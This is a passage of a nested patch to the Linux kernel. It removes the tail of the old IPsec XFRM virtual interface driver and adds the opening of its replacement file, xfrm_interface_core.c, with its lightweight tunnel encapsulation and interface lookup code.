+-	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
+-			      spi, protocol, AF_INET);
+-	if (!x)
+-		return 0;
+-
+-	xi = xfrmi_lookup(net, x);
+-	if (!xi) {
+-		xfrm_state_put(x);
+-		return -1;
+-	}
+-
+-	if (icmp_hdr(skb)->type == ICMP_DEST_UNREACH)
+-		ipv4_update_pmtu(skb, net, info, 0, protocol);
+-	else
+-		ipv4_redirect(skb, net, 0, protocol);
+-	xfrm_state_put(x);
+-
+-	return 0;
+-}
+-
+-static int xfrmi6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+-		    u8 type, u8 code, int offset, __be32 info)
+-{
+-	const struct ipv6hdr *iph = (const struct ipv6hdr *)skb->data;
+-	struct net *net = dev_net(skb->dev);
+-	int protocol = iph->nexthdr;
+-	struct ip_comp_hdr *ipch;
+-	struct ip_esp_hdr *esph;
+-	struct ip_auth_hdr *ah;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	__be32 spi;
+-
+-	switch (protocol) {
+-	case IPPROTO_ESP:
+-		esph = (struct ip_esp_hdr *)(skb->data + offset);
+-		spi = esph->spi;
+-		break;
+-	case IPPROTO_AH:
+-		ah = (struct ip_auth_hdr *)(skb->data + offset);
+-		spi = ah->spi;
+-		break;
+-	case IPPROTO_COMP:
+-		ipch = (struct ip_comp_hdr *)(skb->data + offset);
+-		spi = htonl(ntohs(ipch->cpi));
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	if (type != ICMPV6_PKT_TOOBIG &&
+-	    type != NDISC_REDIRECT)
+-		return 0;
+-
+-	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
+-			      spi, protocol, AF_INET6);
+-	if (!x)
+-		return 0;
+-
+-	xi = xfrmi_lookup(net, x);
+-	if (!xi) {
+-		xfrm_state_put(x);
+-		return -1;
+-	}
+-
+-	if (type == NDISC_REDIRECT)
+-		ip6_redirect(skb, net, skb->dev->ifindex, 0,
+-			     sock_net_uid(net, NULL));
+-	else
+-		ip6_update_pmtu(skb, net, info, 0, 0, sock_net_uid(net, NULL));
+-	xfrm_state_put(x);
+-
+-	return 0;
+-}
+-
+-static int xfrmi_change(struct xfrm_if *xi, const struct xfrm_if_parms *p)
+-{
+-	if (xi->p.link != p->link)
+-		return -EINVAL;
+-
+-	xi->p.if_id = p->if_id;
+-
+-	return 0;
+-}
+-
+-static int xfrmi_update(struct xfrm_if *xi, struct xfrm_if_parms *p)
+-{
+-	struct net *net = xi->net;
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	int err;
+-
+-	xfrmi_unlink(xfrmn, xi);
+-	synchronize_net();
+-	err = xfrmi_change(xi, p);
+-	xfrmi_link(xfrmn, xi);
+-	netdev_state_change(xi->dev);
+-	return err;
+-}
+-
+-static int xfrmi_get_iflink(const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	return xi->p.link;
+-}
+-
+-static const struct net_device_ops xfrmi_netdev_ops = {
+-	.ndo_init	= xfrmi_dev_init,
+-	.ndo_uninit	= xfrmi_dev_uninit,
+-	.ndo_start_xmit = xfrmi_xmit,
+-	.ndo_get_stats64 = dev_get_tstats64,
+-	.ndo_get_iflink = xfrmi_get_iflink,
+-};
+-
+-static void xfrmi_dev_setup(struct net_device *dev)
+-{
+-	dev->netdev_ops 	= &xfrmi_netdev_ops;
+-	dev->header_ops		= &ip_tunnel_header_ops;
+-	dev->type		= ARPHRD_NONE;
+-	dev->mtu		= ETH_DATA_LEN;
+-	dev->min_mtu		= ETH_MIN_MTU;
+-	dev->max_mtu		= IP_MAX_MTU;
+-	dev->flags 		= IFF_NOARP;
+-	dev->needs_free_netdev	= true;
+-	dev->priv_destructor	= xfrmi_dev_free;
+-	netif_keep_dst(dev);
+-
+-	eth_broadcast_addr(dev->broadcast);
+-}
+-
+-#define XFRMI_FEATURES (NETIF_F_SG |		\
+-			NETIF_F_FRAGLIST |	\
+-			NETIF_F_GSO_SOFTWARE |	\
+-			NETIF_F_HW_CSUM)
+-
+-static int xfrmi_dev_init(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device *phydev = __dev_get_by_index(xi->net, xi->p.link);
+-	int err;
+-
+-	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
+-	if (!dev->tstats)
+-		return -ENOMEM;
+-
+-	err = gro_cells_init(&xi->gro_cells, dev);
+-	if (err) {
+-		free_percpu(dev->tstats);
+-		return err;
+-	}
+-
+-	dev->features |= NETIF_F_LLTX;
+-	dev->features |= XFRMI_FEATURES;
+-	dev->hw_features |= XFRMI_FEATURES;
+-
+-	if (phydev) {
+-		dev->needed_headroom = phydev->needed_headroom;
+-		dev->needed_tailroom = phydev->needed_tailroom;
+-
+-		if (is_zero_ether_addr(dev->dev_addr))
+-			eth_hw_addr_inherit(dev, phydev);
+-		if (is_zero_ether_addr(dev->broadcast))
+-			memcpy(dev->broadcast, phydev->broadcast,
+-			       dev->addr_len);
+-	} else {
+-		eth_hw_addr_random(dev);
+-		eth_broadcast_addr(dev->broadcast);
+-	}
+-
+-	return 0;
+-}
+-
+-static int xfrmi_validate(struct nlattr *tb[], struct nlattr *data[],
+-			 struct netlink_ext_ack *extack)
+-{
+-	return 0;
+-}
+-
+-static void xfrmi_netlink_parms(struct nlattr *data[],
+-			       struct xfrm_if_parms *parms)
+-{
+-	memset(parms, 0, sizeof(*parms));
+-
+-	if (!data)
+-		return;
+-
+-	if (data[IFLA_XFRM_LINK])
+-		parms->link = nla_get_u32(data[IFLA_XFRM_LINK]);
+-
+-	if (data[IFLA_XFRM_IF_ID])
+-		parms->if_id = nla_get_u32(data[IFLA_XFRM_IF_ID]);
+-
+-	if (data[IFLA_XFRM_COLLECT_METADATA])
+-		parms->collect_md = true;
+-}
+-
+-static int xfrmi_newlink(struct net *src_net, struct net_device *dev,
+-			struct nlattr *tb[], struct nlattr *data[],
+-			struct netlink_ext_ack *extack)
+-{
+-	struct net *net = dev_net(dev);
+-	struct xfrm_if_parms p = {};
+-	struct xfrm_if *xi;
+-	int err;
+-
+-	xfrmi_netlink_parms(data, &p);
+-	if (p.collect_md) {
+-		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-
+-		if (p.link || p.if_id) {
+-			NL_SET_ERR_MSG(extack, "link and if_id must be zero");
+-			return -EINVAL;
+-		}
+-
+-		if (rtnl_dereference(xfrmn->collect_md_xfrmi))
+-			return -EEXIST;
+-
+-	} else {
+-		if (!p.if_id) {
+-			NL_SET_ERR_MSG(extack, "if_id must be non zero");
+-			return -EINVAL;
+-		}
+-
+-		xi = xfrmi_locate(net, &p);
+-		if (xi)
+-			return -EEXIST;
+-	}
+-
+-	xi = netdev_priv(dev);
+-	xi->p = p;
+-	xi->net = net;
+-	xi->dev = dev;
+-
+-	err = xfrmi_create(dev);
+-	return err;
+-}
+-
+-static void xfrmi_dellink(struct net_device *dev, struct list_head *head)
+-{
+-	unregister_netdevice_queue(dev, head);
+-}
+-
+-static int xfrmi_changelink(struct net_device *dev, struct nlattr *tb[],
+-			   struct nlattr *data[],
+-			   struct netlink_ext_ack *extack)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net *net = xi->net;
+-	struct xfrm_if_parms p = {};
+-
+-	xfrmi_netlink_parms(data, &p);
+-	if (!p.if_id) {
+-		NL_SET_ERR_MSG(extack, "if_id must be non zero");
+-		return -EINVAL;
+-	}
+-
+-	if (p.collect_md) {
+-		NL_SET_ERR_MSG(extack, "collect_md can't be changed");
+-		return -EINVAL;
+-	}
+-
+-	xi = xfrmi_locate(net, &p);
+-	if (!xi) {
+-		xi = netdev_priv(dev);
+-	} else {
+-		if (xi->dev != dev)
+-			return -EEXIST;
+-		if (xi->p.collect_md) {
+-			NL_SET_ERR_MSG(extack,
+-				       "device can't be changed to collect_md");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	return xfrmi_update(xi, &p);
+-}
+-
+-static size_t xfrmi_get_size(const struct net_device *dev)
+-{
+-	return
+-		/* IFLA_XFRM_LINK */
+-		nla_total_size(4) +
+-		/* IFLA_XFRM_IF_ID */
+-		nla_total_size(4) +
+-		/* IFLA_XFRM_COLLECT_METADATA */
+-		nla_total_size(0) +
+-		0;
+-}
+-
+-static int xfrmi_fill_info(struct sk_buff *skb, const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct xfrm_if_parms *parm = &xi->p;
+-
+-	if (nla_put_u32(skb, IFLA_XFRM_LINK, parm->link) ||
+-	    nla_put_u32(skb, IFLA_XFRM_IF_ID, parm->if_id) ||
+-	    (xi->p.collect_md && nla_put_flag(skb, IFLA_XFRM_COLLECT_METADATA)))
+-		goto nla_put_failure;
+-	return 0;
+-
+-nla_put_failure:
+-	return -EMSGSIZE;
+-}
+-
+-static struct net *xfrmi_get_link_net(const struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	return xi->net;
+-}
+-
+-static const struct nla_policy xfrmi_policy[IFLA_XFRM_MAX + 1] = {
+-	[IFLA_XFRM_UNSPEC]		= { .strict_start_type = IFLA_XFRM_COLLECT_METADATA },
+-	[IFLA_XFRM_LINK]		= { .type = NLA_U32 },
+-	[IFLA_XFRM_IF_ID]		= { .type = NLA_U32 },
+-	[IFLA_XFRM_COLLECT_METADATA]	= { .type = NLA_FLAG },
+-};
+-
+-static struct rtnl_link_ops xfrmi_link_ops __read_mostly = {
+-	.kind		= "xfrm",
+-	.maxtype	= IFLA_XFRM_MAX,
+-	.policy		= xfrmi_policy,
+-	.priv_size	= sizeof(struct xfrm_if),
+-	.setup		= xfrmi_dev_setup,
+-	.validate	= xfrmi_validate,
+-	.newlink	= xfrmi_newlink,
+-	.dellink	= xfrmi_dellink,
+-	.changelink	= xfrmi_changelink,
+-	.get_size	= xfrmi_get_size,
+-	.fill_info	= xfrmi_fill_info,
+-	.get_link_net	= xfrmi_get_link_net,
+-};
+-
+-static void __net_exit xfrmi_exit_batch_net(struct list_head *net_exit_list)
+-{
+-	struct net *net;
+-	LIST_HEAD(list);
+-
+-	rtnl_lock();
+-	list_for_each_entry(net, net_exit_list, exit_list) {
+-		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-		struct xfrm_if __rcu **xip;
+-		struct xfrm_if *xi;
+-		int i;
+-
+-		for (i = 0; i < XFRMI_HASH_SIZE; i++) {
+-			for (xip = &xfrmn->xfrmi[i];
+-			     (xi = rtnl_dereference(*xip)) != NULL;
+-			     xip = &xi->next)
+-				unregister_netdevice_queue(xi->dev, &list);
+-		}
+-		xi = rtnl_dereference(xfrmn->collect_md_xfrmi);
+-		if (xi)
+-			unregister_netdevice_queue(xi->dev, &list);
+-	}
+-	unregister_netdevice_many(&list);
+-	rtnl_unlock();
+-}
+-
+-static struct pernet_operations xfrmi_net_ops = {
+-	.exit_batch = xfrmi_exit_batch_net,
+-	.id   = &xfrmi_net_id,
+-	.size = sizeof(struct xfrmi_net),
+-};
+-
+-static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm6_protocol xfrmi_ah6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm6_protocol xfrmi_ipcomp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	10,
+-};
+-
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-static int xfrmi6_rcv_tunnel(struct sk_buff *skb)
+-{
+-	const xfrm_address_t *saddr;
+-	__be32 spi;
+-
+-	saddr = (const xfrm_address_t *)&ipv6_hdr(skb)->saddr;
+-	spi = xfrm6_tunnel_spi_lookup(dev_net(skb->dev), saddr);
+-
+-	return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
+-}
+-
+-static struct xfrm6_tunnel xfrmi_ipv6_handler __read_mostly = {
+-	.handler	=	xfrmi6_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	2,
+-};
+-
+-static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+-	.handler	=	xfrmi6_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi6_err,
+-	.priority	=	2,
+-};
+-#endif
+-
+-static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm4_protocol xfrmi_ah4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-static struct xfrm4_protocol xfrmi_ipcomp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	10,
+-};
+-
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-static int xfrmi4_rcv_tunnel(struct sk_buff *skb)
+-{
+-	return xfrm4_rcv_spi(skb, IPPROTO_IPIP, ip_hdr(skb)->saddr);
+-}
+-
+-static struct xfrm_tunnel xfrmi_ipip_handler __read_mostly = {
+-	.handler	=	xfrmi4_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	3,
+-};
+-
+-static struct xfrm_tunnel xfrmi_ipip6_handler __read_mostly = {
+-	.handler	=	xfrmi4_rcv_tunnel,
+-	.cb_handler	=	xfrmi_rcv_cb,
+-	.err_handler	=	xfrmi4_err,
+-	.priority	=	2,
+-};
+-#endif
+-
+-static int __init xfrmi4_init(void)
+-{
+-	int err;
+-
+-	err = xfrm4_protocol_register(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-	if (err < 0)
+-		goto xfrm_proto_esp_failed;
+-	err = xfrm4_protocol_register(&xfrmi_ah4_protocol, IPPROTO_AH);
+-	if (err < 0)
+-		goto xfrm_proto_ah_failed;
+-	err = xfrm4_protocol_register(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-	if (err < 0)
+-		goto xfrm_proto_comp_failed;
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-	err = xfrm4_tunnel_register(&xfrmi_ipip_handler, AF_INET);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipip_failed;
+-	err = xfrm4_tunnel_register(&xfrmi_ipip6_handler, AF_INET6);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipip6_failed;
+-#endif
+-
+-	return 0;
+-
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-xfrm_tunnel_ipip6_failed:
+-	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
+-xfrm_tunnel_ipip_failed:
+-	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-#endif
+-xfrm_proto_comp_failed:
+-	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
+-xfrm_proto_ah_failed:
+-	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-xfrm_proto_esp_failed:
+-	return err;
+-}
+-
+-static void xfrmi4_fini(void)
+-{
+-#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
+-	xfrm4_tunnel_deregister(&xfrmi_ipip6_handler, AF_INET6);
+-	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
+-#endif
+-	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
+-	xfrm4_protocol_deregister(&xfrmi_ah4_protocol, IPPROTO_AH);
+-	xfrm4_protocol_deregister(&xfrmi_esp4_protocol, IPPROTO_ESP);
+-}
+-
+-static int __init xfrmi6_init(void)
+-{
+-	int err;
+-
+-	err = xfrm6_protocol_register(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-	if (err < 0)
+-		goto xfrm_proto_esp_failed;
+-	err = xfrm6_protocol_register(&xfrmi_ah6_protocol, IPPROTO_AH);
+-	if (err < 0)
+-		goto xfrm_proto_ah_failed;
+-	err = xfrm6_protocol_register(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-	if (err < 0)
+-		goto xfrm_proto_comp_failed;
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-	err = xfrm6_tunnel_register(&xfrmi_ipv6_handler, AF_INET6);
+-	if (err < 0)
+-		goto xfrm_tunnel_ipv6_failed;
+-	err = xfrm6_tunnel_register(&xfrmi_ip6ip_handler, AF_INET);
+-	if (err < 0)
+-		goto xfrm_tunnel_ip6ip_failed;
+-#endif
+-
+-	return 0;
+-
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-xfrm_tunnel_ip6ip_failed:
+-	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
+-xfrm_tunnel_ipv6_failed:
+-	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-#endif
+-xfrm_proto_comp_failed:
+-	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
+-xfrm_proto_ah_failed:
+-	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-xfrm_proto_esp_failed:
+-	return err;
+-}
+-
+-static void xfrmi6_fini(void)
+-{
+-#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
+-	xfrm6_tunnel_deregister(&xfrmi_ip6ip_handler, AF_INET);
+-	xfrm6_tunnel_deregister(&xfrmi_ipv6_handler, AF_INET6);
+-#endif
+-	xfrm6_protocol_deregister(&xfrmi_ipcomp6_protocol, IPPROTO_COMP);
+-	xfrm6_protocol_deregister(&xfrmi_ah6_protocol, IPPROTO_AH);
+-	xfrm6_protocol_deregister(&xfrmi_esp6_protocol, IPPROTO_ESP);
+-}
+-
+-static const struct xfrm_if_cb xfrm_if_cb = {
+-	.decode_session =	xfrmi_decode_session,
+-};
+-
+-static int __init xfrmi_init(void)
+-{
+-	const char *msg;
+-	int err;
+-
+-	pr_info("IPsec XFRM device driver\n");
+-
+-	msg = "tunnel device";
+-	err = register_pernet_device(&xfrmi_net_ops);
+-	if (err < 0)
+-		goto pernet_dev_failed;
+-
+-	msg = "xfrm4 protocols";
+-	err = xfrmi4_init();
+-	if (err < 0)
+-		goto xfrmi4_failed;
+-
+-	msg = "xfrm6 protocols";
+-	err = xfrmi6_init();
+-	if (err < 0)
+-		goto xfrmi6_failed;
+-
+-
+-	msg = "netlink interface";
+-	err = rtnl_link_register(&xfrmi_link_ops);
+-	if (err < 0)
+-		goto rtnl_link_failed;
+-
+-	lwtunnel_encap_add_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
+-
+-	xfrm_if_register_cb(&xfrm_if_cb);
+-
+-	return err;
+-
+-rtnl_link_failed:
+-	xfrmi6_fini();
+-xfrmi6_failed:
+-	xfrmi4_fini();
+-xfrmi4_failed:
+-	unregister_pernet_device(&xfrmi_net_ops);
+-pernet_dev_failed:
+-	pr_err("xfrmi init: failed to register %s\n", msg);
+-	return err;
+-}
+-
+-static void __exit xfrmi_fini(void)
+-{
+-	xfrm_if_unregister_cb();
+-	lwtunnel_encap_del_ops(&xfrmi_encap_ops, LWTUNNEL_ENCAP_XFRM);
+-	rtnl_link_unregister(&xfrmi_link_ops);
+-	xfrmi4_fini();
+-	xfrmi6_fini();
+-	unregister_pernet_device(&xfrmi_net_ops);
+-}
+-
+-module_init(xfrmi_init);
+-module_exit(xfrmi_fini);
+-MODULE_LICENSE("GPL");
+-MODULE_ALIAS_RTNL_LINK("xfrm");
+-MODULE_ALIAS_NETDEV("xfrm0");
+-MODULE_AUTHOR("Steffen Klassert");
+-MODULE_DESCRIPTION("XFRM virtual interface");
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+new file mode 100644
+index 0000000000000..94a3609548b11
+--- /dev/null
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -0,0 +1,1244 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ *	XFRM virtual interface
++ *
++ *	Copyright (C) 2018 secunet Security Networks AG
++ *
++ *	Author:
++ *	Steffen Klassert <steffen.klassert@secunet.com>
++ */
++
++#include <linux/module.h>
++#include <linux/capability.h>
++#include <linux/errno.h>
++#include <linux/types.h>
++#include <linux/sockios.h>
++#include <linux/icmp.h>
++#include <linux/if.h>
++#include <linux/in.h>
++#include <linux/ip.h>
++#include <linux/net.h>
++#include <linux/in6.h>
++#include <linux/netdevice.h>
++#include <linux/if_link.h>
++#include <linux/if_arp.h>
++#include <linux/icmpv6.h>
++#include <linux/init.h>
++#include <linux/route.h>
++#include <linux/rtnetlink.h>
++#include <linux/netfilter_ipv6.h>
++#include <linux/slab.h>
++#include <linux/hash.h>
++
++#include <linux/uaccess.h>
++#include <linux/atomic.h>
++
++#include <net/icmp.h>
++#include <net/ip.h>
++#include <net/ipv6.h>
++#include <net/ip6_route.h>
++#include <net/ip_tunnels.h>
++#include <net/addrconf.h>
++#include <net/xfrm.h>
++#include <net/net_namespace.h>
++#include <net/dst_metadata.h>
++#include <net/netns/generic.h>
++#include <linux/etherdevice.h>
++
++static int xfrmi_dev_init(struct net_device *dev);
++static void xfrmi_dev_setup(struct net_device *dev);
++static struct rtnl_link_ops xfrmi_link_ops __read_mostly;
++static unsigned int xfrmi_net_id __read_mostly;
++static const struct net_device_ops xfrmi_netdev_ops;
++
++#define XFRMI_HASH_BITS	8
++#define XFRMI_HASH_SIZE	BIT(XFRMI_HASH_BITS)
++
++struct xfrmi_net {
++	/* lists for storing interfaces in use */
++	struct xfrm_if __rcu *xfrmi[XFRMI_HASH_SIZE];
++	struct xfrm_if __rcu *collect_md_xfrmi;
++};
++
++static const struct nla_policy xfrm_lwt_policy[LWT_XFRM_MAX + 1] = {
++	[LWT_XFRM_IF_ID]	= NLA_POLICY_MIN(NLA_U32, 1),
++	[LWT_XFRM_LINK]		= NLA_POLICY_MIN(NLA_U32, 1),
++};
++
++static void xfrmi_destroy_state(struct lwtunnel_state *lwt)
++{
++}
++
++static int xfrmi_build_state(struct net *net, struct nlattr *nla,
++			     unsigned int family, const void *cfg,
++			     struct lwtunnel_state **ts,
++			     struct netlink_ext_ack *extack)
++{
++	struct nlattr *tb[LWT_XFRM_MAX + 1];
++	struct lwtunnel_state *new_state;
++	struct xfrm_md_info *info;
++	int ret;
++
++	ret = nla_parse_nested(tb, LWT_XFRM_MAX, nla, xfrm_lwt_policy, extack);
++	if (ret < 0)
++		return ret;
++
++	if (!tb[LWT_XFRM_IF_ID]) {
++		NL_SET_ERR_MSG(extack, "if_id must be set");
++		return -EINVAL;
++	}
++
++	new_state = lwtunnel_state_alloc(sizeof(*info));
++	if (!new_state) {
++		NL_SET_ERR_MSG(extack, "failed to create encap info");
++		return -ENOMEM;
++	}
++
++	new_state->type = LWTUNNEL_ENCAP_XFRM;
++
++	info = lwt_xfrm_info(new_state);
++
++	info->if_id = nla_get_u32(tb[LWT_XFRM_IF_ID]);
++
++	if (tb[LWT_XFRM_LINK])
++		info->link = nla_get_u32(tb[LWT_XFRM_LINK]);
++
++	*ts = new_state;
++	return 0;
++}
++
++static int xfrmi_fill_encap_info(struct sk_buff *skb,
++				 struct lwtunnel_state *lwt)
++{
++	struct xfrm_md_info *info = lwt_xfrm_info(lwt);
++
++	if (nla_put_u32(skb, LWT_XFRM_IF_ID, info->if_id) ||
++	    (info->link && nla_put_u32(skb, LWT_XFRM_LINK, info->link)))
++		return -EMSGSIZE;
++
++	return 0;
++}
++
++static int xfrmi_encap_nlsize(struct lwtunnel_state *lwtstate)
++{
++	return nla_total_size(sizeof(u32)) + /* LWT_XFRM_IF_ID */
++		nla_total_size(sizeof(u32)); /* LWT_XFRM_LINK */
++}
++
++static int xfrmi_encap_cmp(struct lwtunnel_state *a, struct lwtunnel_state *b)
++{
++	struct xfrm_md_info *a_info = lwt_xfrm_info(a);
++	struct xfrm_md_info *b_info = lwt_xfrm_info(b);
++
++	return memcmp(a_info, b_info, sizeof(*a_info));
++}
++
++static const struct lwtunnel_encap_ops xfrmi_encap_ops = {
++	.build_state	= xfrmi_build_state,
++	.destroy_state	= xfrmi_destroy_state,
++	.fill_encap	= xfrmi_fill_encap_info,
++	.get_encap_size = xfrmi_encap_nlsize,
++	.cmp_encap	= xfrmi_encap_cmp,
++	.owner		= THIS_MODULE,
++};
++
++#define for_each_xfrmi_rcu(start, xi) \
++	for (xi = rcu_dereference(start); xi; xi = rcu_dereference(xi->next))
++
++static u32 xfrmi_hash(u32 if_id)
++{
++	return hash_32(if_id, XFRMI_HASH_BITS);
++}
++
++static struct xfrm_if *xfrmi_lookup(struct net *net, struct xfrm_state *x)
++{
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	struct xfrm_if *xi;
++
++	for_each_xfrmi_rcu(xfrmn->xfrmi[xfrmi_hash(x->if_id)], xi) {
++		if (x->if_id == xi->p.if_id &&
++		    (xi->dev->flags & IFF_UP))
++			return xi;
++	}
++
++	xi = rcu_dereference(xfrmn->collect_md_xfrmi);
++	if (xi && (xi->dev->flags & IFF_UP))
++		return xi;
++
++	return NULL;
++}
++
++static bool xfrmi_decode_session(struct sk_buff *skb,
++				 unsigned short family,
++				 struct xfrm_if_decode_session_result *res)
++{
++	struct net_device *dev;
++	struct xfrm_if *xi;
++	int ifindex = 0;
++
++	if (!secpath_exists(skb) || !skb->dev)
++		return false;
++
++	switch (family) {
++	case AF_INET6:
++		ifindex = inet6_sdif(skb);
++		break;
++	case AF_INET:
++		ifindex = inet_sdif(skb);
++		break;
++	}
++
++	if (ifindex) {
++		struct net *net = xs_net(xfrm_input_state(skb));
++
++		dev = dev_get_by_index_rcu(net, ifindex);
++	} else {
++		dev = skb->dev;
++	}
++
++	if (!dev || !(dev->flags & IFF_UP))
++		return false;
++	if (dev->netdev_ops != &xfrmi_netdev_ops)
++		return false;
++
++	xi = netdev_priv(dev);
++	res->net = xi->net;
++
++	if (xi->p.collect_md)
++		res->if_id = xfrm_input_state(skb)->if_id;
++	else
++		res->if_id = xi->p.if_id;
++	return true;
++}
++
++static void xfrmi_link(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
++{
++	struct xfrm_if __rcu **xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
++
++	rcu_assign_pointer(xi->next, rtnl_dereference(*xip));
++	rcu_assign_pointer(*xip, xi);
++}
++
++static void xfrmi_unlink(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
++{
++	struct xfrm_if __rcu **xip;
++	struct xfrm_if *iter;
++
++	for (xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
++	     (iter = rtnl_dereference(*xip)) != NULL;
++	     xip = &iter->next) {
++		if (xi == iter) {
++			rcu_assign_pointer(*xip, xi->next);
++			break;
++		}
++	}
++}
++
++static void xfrmi_dev_free(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	gro_cells_destroy(&xi->gro_cells);
++	free_percpu(dev->tstats);
++}
++
++static int xfrmi_create(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net *net = dev_net(dev);
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	int err;
++
++	dev->rtnl_link_ops = &xfrmi_link_ops;
++	err = register_netdevice(dev);
++	if (err < 0)
++		goto out;
++
++	if (xi->p.collect_md)
++		rcu_assign_pointer(xfrmn->collect_md_xfrmi, xi);
++	else
++		xfrmi_link(xfrmn, xi);
++
++	return 0;
++
++out:
++	return err;
++}
++
++static struct xfrm_if *xfrmi_locate(struct net *net, struct xfrm_if_parms *p)
++{
++	struct xfrm_if __rcu **xip;
++	struct xfrm_if *xi;
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++
++	for (xip = &xfrmn->xfrmi[xfrmi_hash(p->if_id)];
++	     (xi = rtnl_dereference(*xip)) != NULL;
++	     xip = &xi->next)
++		if (xi->p.if_id == p->if_id)
++			return xi;
++
++	return NULL;
++}
++
++static void xfrmi_dev_uninit(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct xfrmi_net *xfrmn = net_generic(xi->net, xfrmi_net_id);
++
++	if (xi->p.collect_md)
++		RCU_INIT_POINTER(xfrmn->collect_md_xfrmi, NULL);
++	else
++		xfrmi_unlink(xfrmn, xi);
++}
++
++static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
++{
++	skb_clear_tstamp(skb);
++	skb->pkt_type = PACKET_HOST;
++	skb->skb_iif = 0;
++	skb->ignore_df = 0;
++	skb_dst_drop(skb);
++	nf_reset_ct(skb);
